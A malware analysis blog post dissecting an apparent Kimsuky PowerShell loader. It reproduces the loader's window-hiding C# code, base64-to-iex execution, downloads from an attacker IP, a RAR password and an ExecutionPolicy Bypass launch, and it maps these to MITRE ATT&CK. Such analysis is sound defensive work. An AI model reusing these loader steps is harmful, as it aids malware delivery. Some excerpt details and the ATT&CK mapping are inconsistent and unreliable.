SUMMARY: Link to heading

  1. Introduction  
  2. Technical Analysis  
       2.1. C# Injection with Add-Type  
       2.2. Process Hiding via ShowWindow  
       2.3. Base64 Obfuscation and Dynamic Execution 
       2.4. Distraction PDF and Social Engineering  
       2.5. External Tools and Payload Extraction  
       2.6. Multi-stage Payload Execution  
       2.7. Final Stage Script Execution  
  3. MITRE ATT&CK Mapping  
  4. Final Thoughts  

1. INTRODUCTION Link to heading

APT refers to Advanced Persistent Threat groups known for highly advanced and stealthy malware.  The sample analyzed here is tagged as APT, Kimsuky, and written in PowerShell (.ps1), found on Malware Bazaar.  

Objective: Learn advanced evasion and staging techniques.

2. TECHNICAL ANALYSIS Link to heading

2.1. C# Injection with Add-Type Link to heading 

$sd = Add-Type @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public class WinHpXN
{
    [DllImport("user32.dll")]
    private static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
    public static void SwMng(int processId, int sw)
    {
        Process process = Process.GetProcessById(processId);
        IntPtr hWnd = process.MainWindowHandle;
        if (hWnd != IntPtr.Zero)
            ShowWindow(hWnd, sw);
    }
}
"@
  • The script uses Add-Type to inject and compile C# code inline.
  • Class WinHpXN is created to P/Invoke ShowWindow from user32.dll.
  • Purpose: Hide or show windows from specific processes.

sw values:

  • 0 = SW_HIDE → hide window  
  • 5 = SW_SHOW → show window (not used here)

2.2. Process Hiding via ShowWindow Link to heading 

$fd = Get-Process -Name powershell,WindowsTerminal

foreach ($fz in $fd) {
    [WinHpXN]::SwMng($fz.Id, 0)
}
  • Uses Get-Process to find powershell, WindowsTerminal.
  • Hides their GUI: visual evasion and stealth against analysts or sandboxes.

2.3. Base64 Obfuscation and Dynamic Execution Link to heading 

$gvb = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($sd.Replace('@', '')))
iex $gvb
  • Removes ‘@’ to bypass AV pattern matching.
  • Decodes and executes obfuscated code via Invoke-Expression.
Note
This malware came with ’@’ inside the obfuscation to evade detection.

2.4. Distraction PDF and Social Engineering Link to heading 

Invoke-WebRequest -Uri "http://92[.]119[.]114[.]128/doc.pdf" -OutFile "$env:TEMP\Distribution Document.pdf"
Start-Process -FilePath "Distribution Document.pdf"
  • Downloads and opens a PDF as decoy during malicious activity.  
  • Criminal IP: 92.119.114.128

2.5. External Tools and Payload Extraction Link to heading 

Invoke-WebRequest -Uri "http://92[.]119[.]114[.]128/Assets/UnRAR.exe"
  • Downloads UnRAR.exe to extract password-protected .rar files.  
  • Avoids native Expand-Archive to evade detection.

2.6. Multi-stage Payload Execution Link to heading 

cmd.exe /C "$env:TEMP\UnRAR.exe x -ppoiuytrewq1234 -o+ $env:TEMP\orwartde.rar $env:TEMP"
Start-Process -FilePath orwartde.exe
  • Uses password-protected RAR to extract malicious binaries.
  • Runs multiple stages (e.g., orwartde.exe, enwtsv.exe) to increase persistence.

2.7. Final Stage Script Execution Link to heading 

$t = Invoke-WebRequest ...
$gds = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($t))
Set-Content -Path "$env:TEMP\ov4_dd_pf.txt" -Value $gds
if (Test-Path "$env:TEMP\ov4_dd_pf.ps1") {
    Remove-Item -Path "$env:TEMP\ov4_dd_pf.ps1" -Force
}
cmd.exe /C "powershell -ExecutionPolicy Bypass -File $env:TEMP\ov4_dd_pf.ps1"
  • Downloads another base64 PowerShell payload and executes it.
  • Uses .txt to .ps1 renaming to evade AV.
  • Runs using ExecutionPolicy Bypass.

3. MITRE ATT&CK MAPPING Link to heading

Defense Evasion Link to heading

  • T1027: Obfuscated Files (Base64)  
  • T1027.002: Packed Files (.rar with password)  
  • T1218: Signed Binary Proxy Execution (cmd.exe, Start-Process)  
  • T1036: Masquerading (.ps1 disguised as .txt)  
  • T1548.002: Bypass User Account Control (ExecutionPolicy Bypass)  

Command and Control Link to heading

  • T1071.001: Application Layer Protocol (HTTP)  
  • T1105: Ingress Tool Transfer (Downloads: .exe, .rar)  

Discovery Link to heading

  • T1057: Process Discovery (Get-Process to find terminals)

4. FINAL THOUGHTS Link to heading

In my opinion, we were able to learn a lot, especially interesting   APT techniques that can be used in the real world.

Thx for reading!   — @untw0 😊